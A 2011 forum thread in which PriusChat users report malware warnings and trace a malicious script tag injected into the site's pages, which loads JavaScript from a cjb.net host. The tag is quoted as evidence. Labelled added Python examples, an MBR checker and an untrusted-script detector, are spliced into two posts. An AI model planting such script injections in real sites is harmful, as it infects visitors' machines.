Received a virus warning? Post a screen shot here

Discussion in 'PriusChat Website Questions' started by TonyPSchaefer, Oct 9, 2011.

  1. sipnfuel

    sipnfuel New Member

    Joined:
    Jan 21, 2011
    1,080
    174
    0
    Location:
    So. Cal.
    Vehicle:
    2010 Prius
    Model:
    II
    I had some malware about 10 days ago that hijacked my browser. Yes, I was browsing this site at the time, but I cannot say for sure it came from this site.

    It also disabled my anti-virus (Microsoft Security Essentials) and prevented some anti-spyware software from running. With these being my basic defense I had to download some new stuff to remove it. After a few hours it seems the malware went away, but despite my efforts, nothing seemed to actually have done the removal. I never got a positive hit or confirmation that anything was detected.

    So I am a bit paranoid on how this thing went away, or if it ever did. Perhaps it is just dormant.

    In any event, I have done no less than the following:

    TDSSKiller
    Spybot S&D - Full Scan
    Malwarebytes Anti-Malware - Full Scan (this was the software that the malware prevented from running)
    IOBytes Malware Fighter - Full Scan
    Spyware Doctor - Full Scan (this software turns out to be a bit useless)

    Reviewed HijackThis logs
    Microsoft Security Essentials - Full Scan
    Switched to AVG Anti-Virus, ran Full Scan

    ComboFix multiple times

    I've updated Flash, Java and Adobe Acrobat to the latest versions now.

    Well, nothing has come up with so many scans... any ideas?
     
  2. chucko

    chucko Junior Member

    Joined:
    Feb 15, 2008
    13
    1
    0
    Location:
    Oregon
    Vehicle:
    2014 Prius
    Model:
    Five
    It could be some type of a rootkit. When faced with an issue like this, one of the tools in my arsenal is to remove the drive from the affected PC and attach it to a known good PC as a secondary (non-boot) drive and then scan it again using a broad selection of scanners.

    As you probably already know, a rootkit is able to hide itself from the operating system on an infected PC, so by moving the drive to another system and not booting from it you've removed the ability of the rootkit to hide itself, and then it should be a more straightforward process to find and remove it.

    I use a USB to PATA/SATA adapter to attach the drive to the known good PC. Something like this:

    Newegg.com - BYTECC BT-300 USB 2.0 to IDE/SATA Adapter

    One scanner that I use regularly that you did not mention is SuperAntiSpyware. I think you probably mentioned the rest of the good ones.

    SUPERAntiSpyware.com | Remove Malware | Remove Spyware - AntiMalware, AntiSpyware, AntiAdware!
     
  3. sipnfuel

    sipnfuel New Member

    Joined:
    Jan 21, 2011
    1,080
    174
    0
    Location:
    So. Cal.
    Vehicle:
    2010 Prius
    Model:
    II
    If I slave this drive to another computer, would that other computer be able to detect viruses in the master boot record?

    This drive is from a laptop and it has a recovery partition, which I will need in order to restore the system if I need to. I'm thinking the virus is not smart enough to modify any files in the recovery partition, but who knows. Usually the recovery partition is not visible even if you run it as a slave. I'm not sure if any antivirus program could scan it.

    I'm thinking of just restoring the system, but worried something could have altered the MBR.
     
  4. chucko

    chucko Junior Member

    Joined:
    Feb 15, 2008
    13
    1
    0
    Location:
    Oregon
    Vehicle:
    2014 Prius
    Model:
    Five
    Yes, if you slave the drive, most AV software and popular malware scanners will detect MBR infections. I'm not aware of anything that will infect a recovery partition off the top of my head, but it sure could be possible.

    The beauty of scanning a drive that is a slave instead of the boot partition is that all of the drive partitions can be scanned, but as you mentioned, many rootkits begin their bad ways by infecting the MBR. I've had plenty of drives that showed as clean when scanned as boot drives but then showed considerable remaining infections (rootkit and otherwise) when scanned as a secondary drive.

    In addition to the SuperAntiSpyware product that I referenced in my previous message, another scanner that I use quite often is HitmanPro. It is a cloud-based second-opinion malware scanner and is good at finding and removing certain rootkits.

    Home - SurfRight

    Microsoft also has a bootable scanner that might be worth a try. You can download it here:

    Microsoft Standalone System Sweeper Beta | Microsoft Connect
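    The two posts above recommend scanning a suspect drive while it is attached as a secondary (non-boot) drive, in part because rootkits often start by modifying the MBR. The script below is an added example, not from this thread or any of the tools named in it: it parses a 512-byte MBR sector, hashes the boot-code region, lists the partition table, and compares the boot code against a SHA-256 baseline you would have recorded while the drive was known clean. The sample sector is constructed inline; the baseline hash and the sector-reading paths in the comment are assumptions for illustration.

```python
"""Parse a 512-byte MBR sector and compare its boot code against a known-good hash."""
import hashlib
import struct

SECTOR = 512
BOOT_CODE_LEN = 440        # bytes 0..439: boot code; 440..443 disk signature; 444..445 reserved
PART_TABLE_OFFSET = 446    # four 16-byte partition entries follow
BOOT_SIGNATURE = b"\x55\xAA"
ENTRY_FMT = "<B3sB3sII"    # status, CHS start, type, CHS end, LBA start, sector count


def build_sample_mbr(boot_code_fill=0x90):
    """Constructed sample MBR (not read from a real disk): filler boot code, one bootable
    NTFS partition (type 0x07) and one hidden recovery partition (type 0x27)."""
    boot_code = bytes([boot_code_fill]) * BOOT_CODE_LEN
    disk_sig = b"\x12\x34\x56\x78" + b"\x00\x00"
    p1 = struct.pack(ENTRY_FMT, 0x80, b"\x00\x00\x00", 0x07, b"\x00\x00\x00", 2048, 200_000_000)
    p2 = struct.pack(ENTRY_FMT, 0x00, b"\x00\x00\x00", 0x27, b"\x00\x00\x00", 200_002_048, 30_000_000)
    empty = bytes(16)
    return boot_code + disk_sig + p1 + p2 + empty + empty + BOOT_SIGNATURE


def parse_mbr(sector):
    """Return the boot-code hash and the non-empty partition entries of one MBR sector."""
    if len(sector) != SECTOR:
        raise ValueError("MBR must be exactly 512 bytes")
    if sector[510:512] != BOOT_SIGNATURE:
        raise ValueError("missing 0x55AA boot signature")
    partitions = []
    for i in range(4):
        off = PART_TABLE_OFFSET + 16 * i
        status, _, ptype, _, lba, count = struct.unpack(ENTRY_FMT, sector[off:off + 16])
        if ptype == 0:
            continue  # unused entry
        partitions.append({
            "index": i,
            "bootable": status == 0x80,
            "type": ptype,
            "lba_start": lba,
            "sectors": count,
        })
    return {
        "boot_code_sha256": hashlib.sha256(sector[:BOOT_CODE_LEN]).hexdigest(),
        "partitions": partitions,
    }


def check_against_baseline(sector, baseline_sha256):
    """Return a list of findings; an empty list means the boot code matches the baseline
    and the partition table has exactly one bootable entry."""
    info = parse_mbr(sector)
    findings = []
    if info["boot_code_sha256"] != baseline_sha256:
        findings.append("boot code differs from known-good baseline")
    bootable = [p for p in info["partitions"] if p["bootable"]]
    if len(bootable) != 1:
        findings.append(f"expected exactly one bootable partition, found {len(bootable)}")
    return findings


if __name__ == "__main__":
    # On a real slaved drive you would read the first sector instead, e.g. from
    # r"\\.\PhysicalDrive1" on Windows or "/dev/sdb" on Linux, with open(path, "rb").read(512).
    clean = build_sample_mbr()
    baseline = parse_mbr(clean)["boot_code_sha256"]  # hash recorded while the drive was clean
    for p in parse_mbr(clean)["partitions"]:
        print(p)
    print("clean sector:", check_against_baseline(clean, baseline))
    print("tampered sector:", check_against_baseline(build_sample_mbr(0xCC), baseline))
```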
     
  5. El Dobro

    El Dobro A Member

    Joined:
    Jul 12, 2011
    6,972
    3,209
    1
    Location:
    NJ
    Vehicle:
    Other Electric Vehicle
    Model:
    N/A
    The same thing happened to me, somebody must not like this site 'cause it's the only time it happens to me. I went back to an earlier start point and all was well, so I started the scans there.
     
  6. sipnfuel

    sipnfuel New Member

    Joined:
    Jan 21, 2011
    1,080
    174
    0
    Location:
    So. Cal.
    Vehicle:
    2010 Prius
    Model:
    II
    I reinstalled SuperAntiSpyware... turns out I had it but uninstalled it for reasons I forget.

    It detected another *.dll trojan. Curiously AVG doesn't detect it on its own, but when I run SAS it takes over the job of cleaning it.

    AVG seems to function better than Microsoft Security Essentials currently.

    I ran TrendMicro RootkitBuster before I ran SuperAntiSpyware, which caused AVG to detect the same .dll. RootkitBuster didn't detect it though.
     
  7. qbee42

    qbee42 My other car is a boat

    Joined:
    Mar 2, 2006
    18,058
    3,073
    7
    Location:
    Northern Michigan
    Vehicle:
    2006 Prius
    Another option is to boot from a live CD. To do this you need to have a fully operational OS that can run from a CD. Most Linux distributions will work, with Ubuntu being one of the most popular. For Windows you can use the Ultimate Boot CD.

    Once the system is booted from the CD, you can mount and scan the affected drives. The main problem with this approach is making sure you have the proper AV software available from the CD.

    Tom
     
  8. sipnfuel

    sipnfuel New Member

    Joined:
    Jan 21, 2011
    1,080
    174
    0
    Location:
    So. Cal.
    Vehicle:
    2010 Prius
    Model:
    II
    Is there a way to boot Ubuntu from a thumb drive with software that is able to scan a Windows hard drive?
     
  9. qbee42

    qbee42 My other car is a boat

    Joined:
    Mar 2, 2006
    18,058
    3,073
    7
    Location:
    Northern Michigan
    Vehicle:
    2006 Prius
  10. cwerdna

    cwerdna Senior Member

    Joined:
    Sep 4, 2005
    12,544
    2,123
    1
    Location:
    SF Bay Area, CA
    Vehicle:
    2006 Prius
    OK, I just got one as a result of doing a Google search for cwerdna us dollar yen wolframalpha and clicking a search result that led to http://priuschat.com/forums/other-c...normal-we-won-t-live-much-longer-deviant.html. Unfortunately, the warning went away, but here's the history and a partial screenshot.

    When viewing the source of that page, I do see:
    <script type="text/javascript" src="http://www.eonytxrmv.cjb.net/mbv.js?iusc"></script>

    Cjb.net corresponds to the supposed attacking computer/URL.
     

    Attached Files:

  11. 2k1Toaster

    2k1Toaster Brand New Prius Batteries

    Joined:
    Feb 14, 2010
    6,035
    3,854
    0
    Location:
    Rocky Mountains
    Vehicle:
    2006 Prius
    Model:
    Three
    Here is a list of supposed linked URLs that Priuschat "dishes out": Palevo Worm | MalwareSurvival

    It does appear that something is injecting bad scripts into the source. Do you have a plain-text source of that page?

    I used a virtual machine with a non-persistent drive to open that link and found no reference to that URL. So it is more than likely not in the database content (not in a post or a signature or anything like that). It is probably a Google ad or another type of ad.
     
  12. cwerdna

    cwerdna Senior Member

    Joined:
    Sep 4, 2005
    12,544
    2,123
    1
    Location:
    SF Bay Area, CA
    Vehicle:
    2006 Prius
    I did have Firefox save down the .htm of the page. Hopefully it didn't mangle it/"fix up" the links.

    I've zipped it and attached it. I would be careful about opening it up on a non-virtual machine in anything that might fetch and execute the script (like a browser)... just to be on the safe side.

    Unfortunately, I did a quick Google search for web attack malicious toolkit website 10 and got a not very helpful page http://www.symantec.com/business/security_response/attacksignatures/detail.jsp?asid=24121. My antivirus app doesn't seem to let me get any more info than what was displayed in the history.
     
  13. 2k1Toaster

    2k1Toaster Brand New Prius Batteries

    Joined:
    Feb 14, 2010
    6,035
    3,854
    0
    Location:
    Rocky Mountains
    Vehicle:
    2006 Prius
    Model:
    Three
    I think this may actually be a server-side issue. It is injecting between the page scripts, not in an ad section.
    It is between the RSS feed:

    Code:
    <link rel="alternate" type="application/rss+xml" title="PriusChat Forums - Other Cars - RSS Feed" href="http://priuschat.com/forums/external.php?type=RSS2&amp;forumids=25" />
    and some generic image javascript:
    Code:
    <script type="text/javascript" src="http://cdn.priuschat.com/forums/clientscript/ame.js" >
    Here is the JavaScript code of the malware. It definitely looks evil. It seems like it tries to hide as an ad. So I am guessing instead of installing Google ad support himself, he used a plugin, and the plugin might have been compromised to give out badness...

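    Posts 10 and 13 above locate the injected tag by reading the saved page source and noticing a script loaded from a host the site never uses, sitting between the RSS <link> and the site's own ame.js include. The script below is an added example, not from this thread or from PriusChat: it parses a saved HTML file, collects every external <script src>, and flags those whose host is not the site's own. The sample HTML is constructed from the tags quoted in the thread, and the list of trusted hosts is an assumption for this example.

```python
"""Flag <script src> references on a saved page that point outside the site's own hosts."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the site is expected to load scripts from (assumption for this example).
TRUSTED_HOSTS = {"priuschat.com", "cdn.priuschat.com"}

# Constructed sample of the <head> section as described in the thread: the injected
# tag sits between the RSS <link> and the site's own ame.js include.
SAMPLE_HTML = """<html><head>
<link rel="alternate" type="application/rss+xml" title="PriusChat Forums - Other Cars - RSS Feed"
      href="http://priuschat.com/forums/external.php?type=RSS2&amp;forumids=25" />
<script type="text/javascript" src="http://www.eonytxrmv.cjb.net/mbv.js?iusc"></script>
<script type="text/javascript" src="http://cdn.priuschat.com/forums/clientscript/ame.js"></script>
<script type="text/javascript" src="/forums/clientscript/local.js"></script>
<script type="text/javascript">var inline = 1;</script>
</head><body></body></html>"""


class ScriptCollector(HTMLParser):
    """Collect the src attribute of every <script> tag, in document order."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        for name, value in attrs:
            if name.lower() == "src" and value:
                self.sources.append(value)


def host_of(url):
    """Lowercased hostname of an absolute URL; None for relative (same-origin) paths."""
    parsed = urlparse(url)
    return parsed.hostname.lower() if parsed.hostname else None


def is_trusted(host, trusted=TRUSTED_HOSTS):
    """A host is trusted if it equals, or is a subdomain of, a trusted host."""
    return any(host == t or host.endswith("." + t) for t in trusted)


def find_untrusted_scripts(html, trusted=TRUSTED_HOSTS):
    """Return the src values of external scripts served from hosts outside the trusted set.
    Relative paths and inline scripts are same-origin and are not reported."""
    collector = ScriptCollector()
    collector.feed(html)
    flagged = []
    for src in collector.sources:
        host = host_of(src)
        if host is not None and not is_trusted(host, trusted):
            flagged.append(src)
    return flagged


if __name__ == "__main__":
    # To check a page Firefox saved to disk: find_untrusted_scripts(open("page.htm").read())
    for src in find_untrusted_scripts(SAMPLE_HTML):
        print("untrusted script source:", src)
```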
    
     
  14. sipnfuel

    sipnfuel New Member

    Joined:
    Jan 21, 2011
    1,080
    174
    0
    Location:
    So. Cal.
    Vehicle:
    2010 Prius
    Model:
    II
    This is no bueno. Where is the malicious code being served? Through PriusChat.com's HTML server or through some third-party HTML server?

    How does the malware inject itself onto the system? Is it browser specific?

    If I switch browsers, will the same code not be able to infect the system?
     
  15. wjtracy

    wjtracy Senior Member

    Joined:
    Sep 19, 2006
    11,312
    3,588
    1
    Location:
    Northern VA (NoVA)
    Vehicle:
    Other Hybrid
    Model:
    N/A
    Just got one on home page screen when I hit the FORUMS link.

    Infection Details

    URL:http://priuschat.com/forums/|%3E{gzip}
    Process:file://C:\Program Files\Internet Explore...
    Infection:html:Script-inf

    Note that in the past, the Avast virus detector has reportedly shown false positives for Script-inf (according to Google hits).
     
  16. trishyco

    trishyco New Member

    Joined:
    Oct 14, 2011
    53
    11
    0
    Location:
    Claremont, CA
    Vehicle:
    2011 Prius
    Model:
    III
    Here are the ones I've caught over the last week. Today's popped up while I was on PriusChat, right after I used the search box to read about octane :confused:
     

    Attached Files:

  17. sipnfuel

    sipnfuel New Member

    Joined:
    Jan 21, 2011
    1,080
    174
    0
    Location:
    So. Cal.
    Vehicle:
    2010 Prius
    Model:
    II
    You are showing a screen shot of MSE, which found an infected file in Avira. Are you running both MSE and Avira?

    On my computer there was a Java Exploit found in the Java Cache directory.
     
  18. trishyco

    trishyco New Member

    Joined:
    Oct 14, 2011
    53
    11
    0
    Location:
    Claremont, CA
    Vehicle:
    2011 Prius
    Model:
    III

    The little image of a coffee cup that Java uses did pop up on my tool bar seconds before both Avira and Microsoft Essentials said I had a malware. I do run them both of them because I wanted one and my husband wanted the other. Thus, I have them both :rolleyes:
     
  19. sipnfuel

    sipnfuel New Member

    Joined:
    Jan 21, 2011
    1,080
    174
    0
    Location:
    So. Cal.
    Vehicle:
    2010 Prius
    Model:
    II
    Uninstall any old versions of Java you have, except the latest. The latest version is Java 6 Update 29.

    Uninstall any version of Java Runtime Environment you may have.
     
  20. trishyco

    trishyco New Member

    Joined:
    Oct 14, 2011
    53
    11
    0
    Location:
    Claremont, CA
    Vehicle:
    2011 Prius
    Model:
    III
    Done, thanks!